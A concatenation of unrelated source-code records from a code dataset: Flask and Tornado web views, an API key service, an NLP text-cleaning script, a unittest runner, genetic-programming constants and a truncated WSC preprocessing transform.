import db\nfrom sqlalchemy import desc\nimport ast\nfrom pytz import timezone\n\ntzchina = timezone('Asia/Shanghai')\nutc = timezone('UTC')\n\nemail_receiver = ['peixindu@nami.org.hk', 'jimmywlhon@nami.org.hk']\n\n\n@apply.route('/device', methods=['GET', 'POST'])\n@login_required\ndef apply_device():\n devices = Device.query.filter(~Device.name.op('regexp')('test.*')).all()\n uds = db.session.query(user_device).filter_by(user_id=current_user.id).all()\n ds = []\n for ud in uds:\n device = Device.query.filter_by(id=ud.device_id).first()\n for d in devices:\n if device.id == d.id:\n devices.remove(d)\n ds.append({\n \"device_id\": d.id,\n \"device_name\": d.name,\n \"device_status\": d.status,\n \"device_details\": d.details\n })\n # selectedChoices = ChoiceObj('devices', session.get(selected))\n # form = DeviceForm(obj=selectedChoices, devices=devices)\n if len(ds) == 0:\n table = None\n else:\n table = DeviceTable(ds)\n if len(devices) == 0:\n return render_template('apply/apply_device.html', form=None, table=table)\n form = DeviceForm(devices=devices)\n if form.validate_on_submit():\n # session['selected'] = form.devices.data\n # print(form.device.data)\n if form.device.data is None:\n flash('Please choose one instrument for application.')\n else:\n device_id = form.device.data\n device_name = []\n for id in device_id:\n device = Device.query.filter_by(id=id).first()\n device_name.append((id, device.name))\n user_email = current_user.email\n application = ApplicationLog(user_email=user_email,\n devices=str(device_id))\n try:\n db.session.add(application)\n db.session.commit()\n for i in email_receiver:\n send_email(i, 'Device Privilege Application',\n 'apply/email/application',\n user_email=user_email,\n device_name=device_name)\n flash('Your application has been sent to admin,'\n ' Please wait for confirmation.')\n except:\n db.session.rollback()\n db.session.flush()\n flash('Some errors occurs, please contact Admin for help.')\n else:\n pass\n # flash(form.errors)\n return render_template('apply/apply_device.html', form=form, table=table)\n\n\n@apply.route('/confirm/', methods=['GET', 'POST'])\n@login_required\n# @admin_required\ndef confirm(user_email):\n if current_user.email not in email_receiver and current_user.email != 'harold@harold.com':\n return render_template('403.html'), 403\n application = ApplicationLog.query.filter_by(user_email=user_email).order_by(desc(ApplicationLog.id)).first_or_404()\n if application.application_state == 'Apply':\n applications = ApplicationLog.query.filter_by(user_email=user_email).filter_by(application_state='Apply'). 
\\\n order_by(desc(ApplicationLog.id)).all()\n # print(type(application.devices))\n # devices = [int(d.strip()) for d in ast.literal_eval(application.devices)]\n d_list = []\n id_list = []\n for application in applications:\n devices = [int(d) for d in ast.literal_eval(application.devices)]\n # print(type(devices))\n for d in devices:\n if d not in id_list:\n id_list.append(d)\n d_list.append(Device.query.filter_by(id=d).first())\n else:\n continue\n form = ConfirmForm(devices=d_list)\n if form.validate_on_submit():\n c_devices = form.device.data\n user = User.query.filter_by(email=user_email).first_or_404()\n d_names = []\n for c_d in c_devices:\n c_d = Device.query.filter_by(id=int(c_d)).first_or_404()\n c_d.users.append(user)\n d_names.append(c_d.name)\n db.session.add(c_d)\n for application in applications:\n application.approved_devices = str([x for x in ast.literal_eval(application.devices)\n if int(x) in c_devices])\n application.application_state = 'Approved'\n db.session.add(application)\n try:\n db.session.commit()\n send_email(user_email, 'Application Confirmed',\n 'apply/email/approve',\n devices=d_names)\n flash('User Device approved.')\n except Exception as e:\n db.session.rollback()\n db.session.flush()\n print(e)\n flash('Error Occurs!')\n else:\n a_dict = {'user_email': application.user_email,\n 'devices': application.devices,\n 'application_time': application.application_time.replace(tzinfo=utc).astimezone(tzchina).strftime(\n '%Y/%m/%d-%H:%M:%S'),\n 'handled_time': application.handled_time.replace(tzinfo=utc).astimezone(tzchina).strftime(\n '%Y/%m/%d-%H:%M:%S'),\n 'approved_devices': application.approved_devices,\n 'application_state': application.application_state}\n table = ApplicationTable([a_dict])\n return render_template('apply/handled.html', table=table)\n return render_template('apply/confirm.html', user_email=user_email, form=form)\n\n\n@apply.route('/reject/', methods=['GET', 'POST'])\n@login_required\n# @admin_required\ndef reject(user_email):\n # print(user_email)\n if current_user.email not in email_receiver and current_user.email != 'harold@harold.com':\n return render_template('403.html'), 403\n application = ApplicationLog.query.filter_by(user_email=user_email).filter_by(application_state='Apply').order_by(\n desc(ApplicationLog.id)).first()\n application.application_state = 'Rejected'\n try:\n db.session.add(application)\n db.session.commit()\n except:\n db.session.rollback()\n db.session.flush()\n send_email(user_email, 'Application Rejected',\n 'apply/email/reject')\n flash('Reject email has been sent to user.')\n return render_template('apply/reject.html')\n","sub_path":"test_device_appointment_system/app/apply/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"118050420","text":"from datetime import datetime\nimport random\nimport string\n\nfrom passlib.hash import pbkdf2_sha256\n\nfrom middlewared.schema import accepts, Bool, Dict, Int, Str, Patch\nfrom middlewared.service import CRUDService, private, ValidationErrors\nfrom middlewared.service_exception import MatchNotFound\nimport middlewared.sqlalchemy as sa\n\n\nclass APIKeyModel(sa.Model):\n __tablename__ = \"account_api_key\"\n\n id = sa.Column(sa.Integer(), primary_key=True)\n name = sa.Column(sa.String(200))\n key = sa.Column(sa.Text())\n created_at = sa.Column(sa.DateTime())\n\n\nclass ApiKeyService(CRUDService):\n\n class Config:\n namespace = \"api_key\"\n 
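# results are read from this datastore and passed through item_extend, which strips the hashed key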
datastore = \"account.api_key\"\n datastore_extend = \"api_key.item_extend\"\n\n @private\n async def item_extend(self, item):\n item.pop(\"key\")\n return item\n\n @accepts(\n Dict(\n \"api_key_create\",\n Str(\"name\", required=True, empty=False),\n register=True\n )\n )\n async def do_create(self, data):\n \"\"\"\n Creates API Key.\n\n `name` is a user-readable name for key.\n \"\"\"\n await self._validate(\"api_key_create\", data)\n\n key = self._generate()\n data[\"key\"] = pbkdf2_sha256.encrypt(key)\n\n data[\"created_at\"] = datetime.utcnow()\n\n data[\"id\"] = await self.middleware.call(\n \"datastore.insert\",\n self._config.datastore,\n data\n )\n\n return self._serve(data, key)\n\n @accepts(\n Int(\"id\", required=True),\n Patch(\n \"api_key_create\",\n \"api_key_update\",\n (\"add\", Bool(\"reset\")),\n (\"attr\", {\"update\": True}),\n )\n )\n async def do_update(self, id, data):\n \"\"\"\n Update API Key `id`.\n\n Specify `reset: true` to reset this API Key.\n \"\"\"\n reset = data.pop(\"reset\", False)\n\n old = await self._get_instance(id)\n new = old.copy()\n\n new.update(data)\n\n await self._validate(\"api_key_update\", new, id)\n\n key = None\n if reset:\n key = self._generate()\n new[\"key\"] = pbkdf2_sha256.encrypt(key)\n\n await self.middleware.call(\n \"datastore.update\",\n self._config.datastore,\n id,\n new,\n )\n\n return self._serve(await self._get_instance(id), key)\n\n @accepts(\n Int(\"id\")\n )\n async def do_delete(self, id):\n \"\"\"\n Delete API Key `id`.\n \"\"\"\n response = await self.middleware.call(\n \"datastore.delete\",\n self._config.datastore,\n id\n )\n\n return response\n\n @private\n async def authenticate(self, key):\n try:\n key_id, key = key.split(\"-\", 1)\n key_id = int(key_id)\n except ValueError:\n return None\n\n try:\n db_key = await self.middleware.call(\"datastore.query\", \"account.api_key\", [(\"id\", \"=\", key_id)],\n {\"get\": True})\n except MatchNotFound:\n return None\n\n if not pbkdf2_sha256.verify(key, db_key[\"key\"]):\n return None\n\n return db_key\n\n async def _validate(self, schema_name, data, id=None):\n verrors = ValidationErrors()\n\n await self._ensure_unique(verrors, schema_name, \"name\", data[\"name\"], id)\n\n if verrors:\n raise verrors\n\n def _generate(self):\n return \"\".join([random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(64)])\n\n def _serve(self, data, key):\n if key is None:\n return data\n\n return dict(data, key=f\"{data['id']}-{key}\")\n","sub_path":"src/middlewared/middlewared/plugins/api_key.py","file_name":"api_key.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180289174","text":"###### Writer : \"Atia\"\n\n\n##### importing the Libraries\nimport csv\nimport re\nimport pandas as pd\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 200)\nfrom nltk.stem.porter import *\nfrom nltk.tokenize import word_tokenize\nfrom gensim.parsing.preprocessing import remove_stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nLem = WordNetLemmatizer()\nimport os\n\n\nos.chdir(\"/Users/macbook/Documents/pyhton/portfolio/Keyword_Frequency/Text_Cleaning\")\n####### reading the csv file\nraw_data = []\nwith open(\"Raw_Text.csv\") as mi:\n reader = csv.reader(mi)\n for line in reader:\n raw_data.append(line)\n\ntotal_data = []\n\nfor x in raw_data:\n\n text = x[3]\n ##### text is a string here, so we need to clean it\n script = text.split(\"'\")\n 
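# clean each fragment: strip punctuation and digits, drop stopwords, lemmatize, and keep only tokens longer than one character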
for sent in script:\n temp = x[:3]\n sent = re.sub(r\"[!”#$%&()*+,-./:;<=>\\\"\\'?@[\\]^_`{|}~–’]\", \" \", sent)\n sent = sent.lower()\n\n #### removing the numbers\n sent = re.sub(r\"\\d+\", \"\", sent)\n\n #### removing the empty spaces\n sent = sent.strip()\n\n #### removing the the stopwords\n sent = remove_stopwords(sent)\n sent = re.sub(r\"'\", \" \", sent)\n\n ######removing the apastroph\n sent = re.sub(\"(’\\w+) ?\", \" \", sent)\n\n ######Separate teh words\n input_str = word_tokenize(sent)\n singledata = []\n\n for wo in input_str:\n lemword = Lem.lemmatize(wo)\n pattern = re.compile(r\"(.)\\1{2,}\")\n wo = pattern.sub(r\"\\1\\1\", lemword)\n if len(wo) > 1:\n singledata.append(lemword)\n\n s = \" \".join(singledata)\n if s != \"\":\n temp.append(s)\n\n if len(temp) > 3:\n total_data.append(temp)\n\n\ndf = pd.DataFrame(total_data)\ndf.columns = [\"city\", \"page\", \"source\", \"text\"]\npath = \"clean_data_ready_for_count.xlsx\"\n\n### remove teh file if it already exists\nif os.path.exists(path):\n os.remove(path)\n\ndf.to_excel(path)\n\n\n\n","sub_path":"Text_Cleaning/text_cleaning.py","file_name":"text_cleaning.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"326264526","text":"# -*- coding:utf-8 -*-\n# Author:YEAR\n\nimport tornado.web\nimport os\nimport sys\n# sys.path.append(r\"A:\\development\\source_code\\oldBoyPython\\lowChouti\\backend\")\nfrom lowChouti.backend.core.request_handler import BaseHandler\n# import core.request_handler\nfrom lowChouti.backend import commons\nimport json\nfrom lowChouti.backend.utils import url\nfrom urllib import request\nimport re\nfrom lowChouti.models import chouti_orm\nfrom lowChouti.backend.session import session\nimport datetime\n\n\n\nclass urlTitleHandler(BaseHandler):\n def get(self, *args, **kwargs):\n print(\"[GET]:urlTitle\")\n\n def post(self, *args, **kwargs):\n ret = {\"status\": True, \"data\": \"\", \"error\": \"链接不正确\"}\n print(\"[POST]:urlTitle\")\n strurl = self.get_argument(\"rURL\", None)\n if re.match('http', strurl) == None:\n strurl = 'http://' + strurl\n strHtml = request.urlopen(strurl).read()\n title = url.get_title_bs(strHtml)\n description = url.get_description_bs(strHtml)\n ret[\"title\"]=title\n ret[\"desc\"]=description\n self.write(json.dumps(ret))\n\nclass publishHandler(BaseHandler):\n def get(self, *args, **kwargs):\n print(\"[GET]:publish\")\n\n def post(self, *args, **kwargs):\n ret={\"status\":True, \"data\":\"\",\"error\":\"发布失败\"}\n print(\"[POST]:publish\")\n userID=self.session[\"userNID\"]\n conn=chouti_orm.Session()\n kind=self.get_argument(\"kind\")\n if kind=='0':\n strurl = self.get_argument(\"link\", None)\n if re.match('http', strurl) == None:\n strurl = 'http://' + strurl\n obj=chouti_orm.News(user_info_id=userID,\n news_type_id=1,\n ctime=datetime.datetime.now(),\n title=self.get_argument(\"title\",None),\n url=strurl,\n Content=self.get_argument(\"zhaiyao\",None))\n conn.add(obj)\n conn.commit()\n elif kind=='1':\n obj = chouti_orm.News(user_info_id=userID,\n news_type_id=2,\n ctime=datetime.datetime.now(),\n title=\"这就是一个段子。。。\",\n url=\"\",\n Content=self.get_argument(\"zhaiyao\",None))\n conn.add(obj)\n conn.commit()\n elif kind=='2':\n obj = chouti_orm.News(user_info_id=userID,\n news_type_id=3,\n ctime=datetime.datetime.now(),\n title=\"这就是一个图片。。。\",\n url=self.get_argument(\"filelink\",None),\n Content=self.get_argument(\"zhaiyao\", None))\n conn.add(obj)\n conn.commit()\n 
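# send the resulting status payload back to the client as JSON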
self.write(json.dumps(ret))\n\n","sub_path":"lowChouti/controllers/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163569609","text":"\"\"\"\n============================\nAuthor:柠檬班-木森\nTime:2019/11/15\nE-mail:3247119728@qq.com\nCompany:湖南零檬信息技术有限公司\n============================\n\"\"\"\n\"\"\"\nThis file is the entry point that launches the test run\n\n\"\"\"\nimport unittest\n\nfrom HTMLTestRunnerNew import HTMLTestRunner\n\n# Step 1: create a test suite\nsuite = unittest.TestSuite()\n\n# Step 2: load the test cases into the test suite\n\n# Option 1: load the cases from a module\n# create a loader object\nimport testcases\n\nloader = unittest.TestLoader()\nsuite.addTest(loader.loadTestsFromModule(testcases))\n\n# Option 2: load from a test case class\n# import testcases\n# loader = unittest.TestLoader()\n# suite.addTest(loader.loadTestsFromTestCase(testcases.LoginTestCase))\n\n# Option 3: add a single test case\n# from testcases import LoginTestCase\n# create a test case object\n# Note: when creating a test case object from a case class, pass in the method name of the case (as a string)\n# case = LoginTestCase(\"test_login_pass\")\n# suite.addTest(case)\n\n# Option 4: load by giving the directory path where the test cases live\n# loader = unittest.TestLoader()\n# suite.addTest(loader.discover(r\"absolute path of the directory containing the test case files\"))\n\n\n# Step 3: create a test runner\nrunner = HTMLTestRunner(stream=open(\"report.html\", \"wb\"),  # open a report file and pass its handle as stream\n                        tester=\"musen,小明。大哥\",  # testers shown in the report\n                        description=\"the first test report of python24\",  # description shown in the report\n                        title=\"test report for the class-24 lesson\")  # title of the report\n\n# Step 4: run the test suite with the runner\nrunner.run(suite)\n","sub_path":"02单元测试搭建/py24_13day/runtest2.py","file_name":"runtest2.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"437851270","text":"import zmq\nimport math\nimport sys\nimport json\nimport pdb\n\nclass Game:\n    def __init__(self):\n        self.bidPips = None\n        self.bidSize = None\n        self.myHand = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0}\n        self.oppDice = 0\n        self.onesOn = True\n\n    @staticmethod\n    def choose(n, k):\n        return math.factorial(n) / (math.factorial(k) * math.factorial(n-k))\n\n    def handSize(self):\n        size = 0\n        #pdb.set_trace()\n\n        for pips in self.myHand.keys():\n            size += self.myHand[pips]\n\n        return size\n\n    def totalDice(self):\n        return self.handSize() + self.oppDice\n\n    def pMatch(self):\n        return (1.0/3.0) if self.onesOn else (1.0/6.0)\n\n    def success(self):\n        target = self.bidSize - self.myHand[self.bidPips]\n\n        if self.onesOn:\n            target -= self.myHand[1]\n\n        if target <= 0:\n            return 1.0\n\n        pSuccess = 0.0\n\n        for i in xrange(target, self.oppDice + 1):\n            inc = Game.choose(self.oppDice, i) * self.pMatch() ** i * (1 - self.pMatch()) ** (self.oppDice - i) \n            pSuccess += inc\n        \n        return pSuccess\n\n    def initialBid(self):\n        count = self.myHand[self.mode()]\n\n        if self.onesOn:\n            count += self.myHand[1]\n\n        count += int(self.oppDice * self.pMatch())\n\n        return [count, self.mode()]\n\n    def mode(self):\n        count = 0\n        mode = 0\n\n        # TODO: handles the hand of all 1s badly\n        for i in xrange(2 if self.onesOn else 1, 7):\n            if self.myHand[i] >= count:\n                count = self.myHand[i]\n                mode = i\n\n        return mode\n\n    def nextBid(self):\n        if self.bidPips != 6:\n            newSize = self.bidSize\n            newPips = self.bidPips + 1\n        else:\n            newSize = self.bidSize + 1\n            if self.onesOn:\n                newPips = 2\n            else:\n                newPips = 1\n\n        return [newSize, newPips]\n\n\n    def setState(self, res):\n        self.myHand = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0}\n\n        if res[\"history\"]:\n            self.bidSize = int(res[\"history\"][-1][0])\n            self.bidPips = int(res[\"history\"][-1][-1])\n        else:\n            self.bidSize = None\n            self.bidPips = None\n\n        if 
res[\"game_complete\"]:\n sys.exit(\"Game over, %s won\" % res[\"winner\"])\n\n self.oppDice = int(res[\"oppenent_dice_num\"])\n self.onesOn = res[\"ones_valid\"]\n\n for pips in res[\"dice\"]:\n self.myHand[pips] += 1\n\n if res[\"winner\"] and not len(res[\"history\"]):\n print(\"Round over, %s wins. Opponent's dice: %s\" % (res[\"winner\"], res[\"opponent_dice\"]))\n return -1\n\nname = raw_input(\"name: \")\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REQ)\nsocket.setsockopt(zmq.IDENTITY, name)\nsocket.connect(\"tcp://localhost:5555\")\nsocket.send(\"register\")\n\nbotId = socket.recv()\n\nif botId == '0':\n sys.exit(\"Duplicate bot name?\")\n\nsocket = context.socket(zmq.REQ)\nsocket.setsockopt(zmq.IDENTITY, botId)\nsocket.connect(\"tcp://localhost:5555\")\nsocket.send(\"start\")\n\ngame = Game()\n\ndef handleTurn():\n res = json.loads(socket.recv())\n\n if 'error' in res:\n print(\"Error: %s\" % res['error'])\n pdb.set_trace()\n\n print(res)\n\n if game.setState(res) == -1:\n socket.send('next')\n return\n\n if game.bidSize != None:\n pSuccess = game.success()\n print(pSuccess)\n if pSuccess < 0.5:\n socket.send(\"0,0\")\n else:\n size, pips = game.nextBid()\n socket.send(\"%s,%s\" % (size, pips))\n else:\n size, pips = game.initialBid()\n socket.send(\"%s,%s\" % (size, pips))\n\n\nwhile True:\n handleTurn()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"272812151","text":"from audz import Audz\n\naudz = Audz()\n\ndef main():\n\tloop()\n\taudz.terminate()\n\ndef loop():\n\trunning = True\n\n\twhile(running):\n\t\tcmd = input('audz> ')\n\t\tif not evaluate(cmd):\n\t\t\trunning = False\n\ndef evaluate(cmd):\n\tcmdList = cmd.split()\n\tif len(cmdList) == 0:\n\t\treturn True\n\telif cmdList[0] == 'quit':\n\t\treturn False\n\telif cmdList[0] == 'play':\n\t\tplay(cmdList[1:])\n\telif cmdList[0] == 'pause':\n\t\taudz.pause()\n\telif cmdList[0] == 'stop':\n\t\taudz.stop()\n\n\treturn True\n\ndef play(cmdList):\n\tif len(cmdList) == 0:\n\t\taudz.play()\n\telif cmdList[0] == 'song':\n\t\tplay_song(cmdList[1:])\n\ndef play_song(cmdList):\n\tif len(cmdList) == 0:\n\t\tpass\n\telse:\n\t\taudz.loadSong(cmdList[0])\n\t\taudz.play()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"c/audz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"567313476","text":"# coding=utf-8\n\nimport os\nimport os.path\nimport re\nimport requests\nimport HTMLParser \nimport chardet\nfrom check_A import check\nfrom check_A import check_whois\n\n# dir = \"../subject1_sample/file\"\nblack_list = ['手机', '银行版权所有']\n\ndef bank_check(text, filename):\n\n\t# file = open(dir + '/' + filename, 'rb')\n\t# try:\n\t\t# text = file.read()\n\n\tif '行' in text or '银' in text:\n\t\ttry:\n\t\t\t# print chardet.detect(text)\n\t\t\tt = HTMLParser.HTMLParser();\n\t\t\ttext = t.unescape(text)\n\n\t\t\tmessage = check(filename)\n\n\t\t\tmess = re.split(',', message)\n\t\t\turl = mess[-1]\t\t\n\t\t\t# print message\n\t\t\t\n\t\t\tfor black in black_list:\n\t\t\t\tif black not in text:\n\t\t\t\t\treturn tuple([True, mess[0]])\n\n\t\t\t\n\t\t\tif check_whois([\"银行\", \"Bank\", \"bank\", \"BANK\"], url):\n\t\t\t\treturn tuple([True, mess[0]])\n\t\t\telse:\n\t\t\t\t# print message\n\t\t\t\treturn tuple([False, mess[0]+\",p\"])\n\n\t\texcept 
UnicodeDecodeError:\n\t\t\tpass\n\n\t\n\telse:\t\t\n\t\tmessage = check(filename)\n\n\t\tmess = re.split(',', message)\n\t\turl = mess[-1]\t\t\n\n\t\tfor black in black_list:\n\t\t\tif black not in text and black.decode('utf-8', 'ignore').encode('gb2312') not in text:\n\t\t\t\treturn tuple([True, mess[0]])\n\n\t\t\n\t\tif check_whois([\"银行\", \"Bank\", \"bank\", \"BANK\"], url):\n\t\t\treturn tuple([True, mess[0]])\n\t\telse:\n\t\t\t# print message\n\t\t\treturn tuple([False, mess[0]+\",p\"])","sub_path":"check/bank_check.py","file_name":"bank_check.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"176380913","text":"from itertools import groupby\r\n\r\nnumbers = [0,0,0,1,1,1,0,0,0,1,1,0,1,1,1,1,0,0,1,1]\r\nbig = 0\r\nfor i,j in groupby(numbers):\r\n d = list(j)\r\n if i==1:\r\n if len(d)>big:\r\n big=len(list(d))\r\nprint('maximum consecutive 1 are :',big)\r\n\r\n","sub_path":"Question 2.py","file_name":"Question 2.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364956518","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Permission\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom bot.controllers.order import create_order, proceed_order, edit_order\nfrom bot.models import Market, Order\n\n\n@login_required(login_url='login')\ndef insight_message(request):\n error_message = None\n if request.method == 'POST':\n order, message = create_order(request.POST, not_save=True)\n if not request.user.has_perm('bot.can_%s' % order.market.name):\n raise PermissionDenied()\n order.save()\n proceed_order(order)\n markets = Market.objects.all()\n return render(request, 'orders/edit_order.html', context={'error': error_message, 'markets': markets})\n\n\n@login_required(login_url='login')\ndef insight_list(request):\n orders = Order.objects.order_by('-date', '-id').all()\n return render(request, 'orders/orders.html', context={\n 'orders': orders\n })\n\n\n@login_required(login_url='login')\ndef edit_insight(request, order_id):\n message = None\n order = get_object_or_404(Order, id=order_id)\n if not request.user.has_perm('bot.can_%s' % order.market.name):\n raise PermissionDenied()\n if request.method == 'POST':\n order, message = edit_order(order, request.POST, edit=True)\n if order:\n return redirect('insight_list')\n return render(request, 'messages/edit_message.html', context={\n 'message': order, 'error': message\n })","sub_path":"bot/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"251921690","text":"# Imports\nfrom keras.layers import *\nfrom keras.layers.advanced_activations import *\nfrom keras.layers.convolutional import *\nfrom keras.models import *\nfrom keras.optimizers import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mnist_data import *\n\n# Load MNIST dataset\ndata = MNIST()\nx_train, _ = data.get_train_set()\nx_test, _ = data.get_test_set()\n\n# Encoded dimension\nencoding_dim = 32\n\n# Keras Model: Autoencoder\n# Input Tensors\ninput_img = Input(shape=(28,28,1,))\ninput_img_flatten = Flatten()(input_img)\n# Encoder Part\nencoded = 
Dense(256, activation=\"relu\")(input_img_flatten) # 784 => 256\nencoded = Dense(128, activation=\"relu\")(encoded) # 256 => 128\nencoded = Dense(encoding_dim, activation=\"relu\")(encoded) # 128 => 32\n# Decoder Part\ndecoded = Dense(128, activation=\"relu\")(encoded) # 32 => 128\ndecoded = Dense(256, activation=\"relu\")(decoded) # 128 => 256\ndecoded = Dense(784, activation=\"sigmoid\")(decoded) # 256 => 784\n# Output Tensors\noutput_img = Reshape((28,28,1,))(decoded)\nautoencoder = Model(input=input_img, output=output_img)\n\n# Training\nautoencoder.compile(optimizer=\"adadelta\", loss=\"binary_crossentropy\")\nautoencoder.fit(x_train, x_train, epochs=50, batch_size=128, validation_data=(x_test, x_test))\n\n# Testing\ntest_images = x_test[:10]\ndecoded_imgs = autoencoder.predict(test_images)\n\n# Plot test images\nplt.figure(figsize=(12,6))\nfor i in range(10):\n    # Original image\n    ax = plt.subplot(2 , 10, i+1)\n    plt.imshow(test_images[i].reshape(28,28), cmap=\"gray\")\n    # Decoded image\n    ax = plt.subplot(2 , 10, i+1+10)\n    plt.imshow(decoded_imgs[i].reshape(28,28), cmap=\"gray\")\nplt.show()","sub_path":"Udemy/Udemy-GAN-Kurs/Udemy GAN Kurs/Abschnitt7 - Autoencoder/1 - Autoencoder/deepautoencoder.py","file_name":"deepautoencoder.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"538972510","text":"\n# From a list containing ints, strings and floats, make three lists to store them separately\n# Using range(1,101), make two lists, one containing all even numbers and the other containing all odd numbers.\n \n\n# declare the two lists first\n# use a for loop to produce each number from 1 to 101\n# in each loop iteration, write an if statement checking whether the number is odd or even\n# print the result\n\n\noddList = []\nevenList = []\n#variables always start with a lowercase letter!!! odd list -> oddList, even list -> evenList => camelCase \n\nfor each in range(1,101):\n    if each % 2 == 0:#for even nums\n        evenList.append(each)\n    elif each % 2 == 1:\n        oddList.append(each)\n\nprint(oddList, evenList)","sub_path":"Lectures/lecture8.py","file_name":"lecture8.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"372310024","text":"# _*_ coding: utf_8 _*_\r\n\"\"\"\r\nThe :mod:`constants` module provides global variables that are used by\r\nthe push interpreter and GP modules.\r\n\r\nThese definitions are mostly used by instructions to keep computed values within\r\nlimits or when using random instructions. 
These values do not generally need\r\nto be tuned to improve GP performance.\r\n\"\"\"\r\n\r\n#: List of stack types that the ``pyshgp`` Push interpreter can handle.\r\npysh_types = ['_exec', '_integer', '_float', '_string', '_char', '_boolean',\r\n              '_code', '_auxiliary', '_vector_integer', '_vector_float',\r\n              '_vector_boolean', '_vector_string']\r\n\r\n#: Used by keep_number_reasonable as the maximum size of any integer or float\r\nmax_number_magnitude = 1000000000000\r\n\r\n#: Used by keep_number_reasonable as the minimum magnitude of any float\r\nmin_number_magnitude = 1.0E-10\r\n\r\n#: Used by string instructions to ensure that strings don't get too large\r\nmax_string_length = 5000\r\n\r\n#: Used by vector instructions to ensure that vectors don't get too large\r\nmax_vector_length = 5000\r\n\r\n#: The minimum value created by the integer_rand instruction\r\nmin_random_integer = -10\r\n\r\n#: The maximum value created by the integer_rand instruction\r\nmax_random_integer = 10\r\n\r\n#: The minimum value created by the float_rand instruction\r\nmin_random_float = -1.0\r\n\r\n#: The maximum value created by the float_rand instruction\r\nmax_random_float = 1.0\r\n\r\n#: The minimum length of string created by the string_rand instruction\r\nmin_random_string_length = 1\r\n\r\n#: The maximum length of string created by the string_rand instruction\r\nmax_random_string_length = 10\r\n\r\n#: The maximum length of code created by the code_rand instruction\r\nmax_points_in_random_expressions = 50\r\n\r\n\r\n#: The number of Push instructions that can be evaluated before stopping evaluation\r\nglobal_evalpush_limit = 150\r\n\r\n#: The time in nanoseconds that a program can evaluate before stopping, 0 means no time limit\r\nglobal_evalpush_time_limit = 0\r\n\r\n#: Maximum size of push programs and push code, as counted by points in the\r\n#: program. Also, the maximum size of code that can appear on the exec or\r\n#: code stacks. 
This is set during evolution, but also has a default value here\r\n#: for push executions that happen outside of evolution.\r\nglobal_max_points = 200\r\n","sub_path":"pyshgp/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"654250973","text":"from functools import reduce\nimport operator\nimport en_core_web_lg # python -m spacy download en_core_web_lg\nspnlp = en_core_web_lg.load()\nimport torch\nfrom fastai2.text.all import *\nfrom _utils.huggingface import HF_BaseTransform, HF_Model\n\n@delegates(but=[\"out_cols\"])\nclass WSCTrickTfm(HF_BaseTransform):\n\n def __init__(self, hf_dset, hf_toker, **kwargs):\n super().__init__(hf_dset, out_cols=['prefix', 'suffix', 'cands', 'cand_lens', 'label'], **kwargs)\n self.tokenizer = hf_toker\n self.tokenizer_config = hf_toker.pretrained_init_configuration\n\n def __getstate__(self):\n state = self.__dict__.copy()\n state['tokenizer'] = None\n return state\n\n def simple_encode(self, text):\n return self.tokenizer.convert_tokens_to_ids(self.tokenizer.tokenize(text))\n\n def __call__(self, sample):\n # get candidates that solve pronoun\n sentence = spnlp(sample['text'])\n noun_chunks = extended_noun_chunks(sentence)\n cand_spans = filter_noun_chunks(\n noun_chunks,\n exclude_pronouns=True,\n exclude_query=sample['span1_text'],\n exact_match=False,)\n cands = [str(span) for span in cand_spans]\n cands = list(set(cands)) # no repeated\n\n # get texts without target span\n target_start, target_end = sample['span2_index'], sample['span2_index']+len(sample['span2_text'].split())\n prefix = ' '.join(sample['text'].split()[:target_start])\n suffix = ' '.join(sample['text'].split()[target_end:])\n\n # tokenize\n sample['prefix'] = self.tokenizer.encode(prefix)[:-1] # no SEP\n sample['suffix'] = self.tokenizer.encode(suffix)[1:] # no CLS\n cands = [self.simple_encode(sample['span1_text'])] + [self.simple_encode(cand) for cand in cands]\n sample['cands'] = reduce(operator.add, cands, []) # flatten list, into a 1d token ids\n sample['cand_lens'] = [len(cand) for cand in cands]\n # sample already have 'label'\n\n return sample\n\ndef extended_noun_chunks(sentence):\n noun_chunks = {(np.start, np.end) for np in sentence.noun_chunks}\n np_start, cur_np = 0, 'NONE'\n for i, token in 